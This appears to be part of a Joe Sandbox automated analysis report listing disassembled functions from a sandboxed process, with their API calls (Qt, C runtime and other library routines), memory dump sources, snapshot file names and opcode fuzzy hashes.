                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clear@Cache@@Pixmap
                                                                                                                                                                                                                                          • String ID: QPixmapCache$clear$clear()
                                                                                                                                                                                                                                          • API String ID: 3699800772-2669739335
                                                                                                                                                                                                                                          • Opcode ID: 2f0b2d589a30ebcd163192d472fb86fa0997706b85f5c24c82bbb6408e528cf9
                                                                                                                                                                                                                                          • Instruction ID: 5497cfe8833737fdd6ab53e3e10a06e663625a3b4a8f3c6cd632f1d1b73cda77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0b2d589a30ebcd163192d472fb86fa0997706b85f5c24c82bbb6408e528cf9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0FF36A09A47D2EA209B51E8852A523B0FB58F89FC04432DA8F43720EF3CF169C304
                                                                                                                                                                                                                                          Function 00007FF71250F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction ID: c2b17bb5ae86e995ec78ecd07b21b463e77b5dda114a34ace26746e77f99f1f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62513772F04A118BEB14EF649DD56BCB761AB44378F900275DD1D52AE4EF7CA40ACB10
                                                                                                                                                                                                                                          Function 00007FF89ECA21E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 83stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA220A
                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA2228
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                          • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                          • Opcode ID: b82a69353089fb67708d77c7baffa59225a8d2ade895b0ace0a94b2f11093c47
                                                                                                                                                                                                                                          • Instruction ID: 054c8d56889412a2b50411b353dfdc73be794a212faed2d443735ff96da8acbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82a69353089fb67708d77c7baffa59225a8d2ade895b0ace0a94b2f11093c47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31BF72728B4186DB348F19E4806A9BB52FB84BE8F444230FAD947AD9DB3CE5018B50
                                                                                                                                                                                                                                          Function 00007FF89D9C3EE0 Relevance: 6.1, APIs: 4, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F19
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F2F
                                                                                                                                                                                                                                          • ??0QTextCursor@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F8F
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FF89D9459D4), ref: 00007FF89D9C3F9D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array$?allocate@AllocationData@@Data@@@@@Flags@Option@U1@_V0@@$Cursor@@Font@@Text
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3532179901-0
                                                                                                                                                                                                                                          • Opcode ID: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                                          • Instruction ID: 88d0b10bbaecb4968586676c8c5818eff65fb5b4e893d4aa79f815a4091f475e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99319833705A45C2EA20DF5AE84426CB7B0F788FC4B958126DE8E07764EF39E496C700
                                                                                                                                                                                                                                          Function 00007FF89EA7C9AC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2744629635.00007FF89E7B1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF89E7B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2744600794.00007FF89E7B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2744882352.00007FF89EA7E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745042222.00007FF89EBCB000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745119478.00007FF89EBDB000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745190481.00007FF89EBE1000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745221047.00007FF89EBE6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745284260.00007FF89EBF5000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745430076.00007FF89EBFC000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745631838.00007FF89EBFD000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2745830103.00007FF89EBFE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746029797.00007FF89EBFF000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746211552.00007FF89EC18000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746357327.00007FF89EC27000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746495440.00007FF89EC37000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746710382.00007FF89EC38000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2746896396.00007FF89EC39000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747030146.00007FF89EC3A000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747151835.00007FF89EC3D000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747305066.00007FF89EC3F000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89e7b0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                                          • Instruction ID: 7460ebded5764dc4fd50d0b5180003e8b9a5cf2ef1fb2165514395b8dd1b0276
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D117C22B15F018AEB10CF60E8852B837A4FB19B98F041E35EA6D467A8DF3CE159C350
                                                                                                                                                                                                                                          Function 00007FF89ECA2E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction ID: 518ee419c0478ba603cc176aa3a42230cf82864d3d25eb0a828feba6219a7c5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D112126B14F0589FB20CF64E8942B837A4FB19B98F441D31EA6D47794EF7CE1948350
                                                                                                                                                                                                                                          Function 00007FF712515B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                          • Instruction ID: 246698f8ec1c2415241ea0e369f02d1ec9127c2bf402482d6056af7218835a6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3441F922B08A8245F764AF25E4C1379E750EB80BB8F984275EE5D06BD5DFBCD449C710
                                                                                                                                                                                                                                          Function 00007FF71250CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                          • Instruction ID: 05469cda44b1c541649f0317bbe74c7e81bd2631ea04ad56f9ee33eb8d9fc1ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0441B332718F8181DB20DF25E8843AAA760FB897A4F804131EE4D87794EF7CD405C754
                                                                                                                                                                                                                                          Function 00007FF89D9BC060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 01a0e10901e9ac67c1b830c76807e90382355e5d28c50bb404fbeaf3b966b884
                                                                                                                                                                                                                                          • Instruction ID: 2f300738aa61b5b755a9b24f5f8f96150ba1f8a03a2fef183b10c3219eb5b80b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01a0e10901e9ac67c1b830c76807e90382355e5d28c50bb404fbeaf3b966b884
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E317E73A09A4685EA219B26A405178A3A0FF84FD4F09C531DE8E23764EF3CF1858704
                                                                                                                                                                                                                                          Function 00007FF89D97BF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: aa6b8bece804c67dba4c2cbeeb32e336c8a10e562b16c2a745d8bf29b8d86e73
                                                                                                                                                                                                                                          • Instruction ID: c2efb91a331daac7427d6b613f4060eff61bed0b0e645ed7a6246ec02bdb52c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa6b8bece804c67dba4c2cbeeb32e336c8a10e562b16c2a745d8bf29b8d86e73
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E316F77A09A4686EA21AB16E445079A3A0FF48FD4F088131DE8E17764FF3CF596C748
                                                                                                                                                                                                                                          Function 00007FF89D943A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
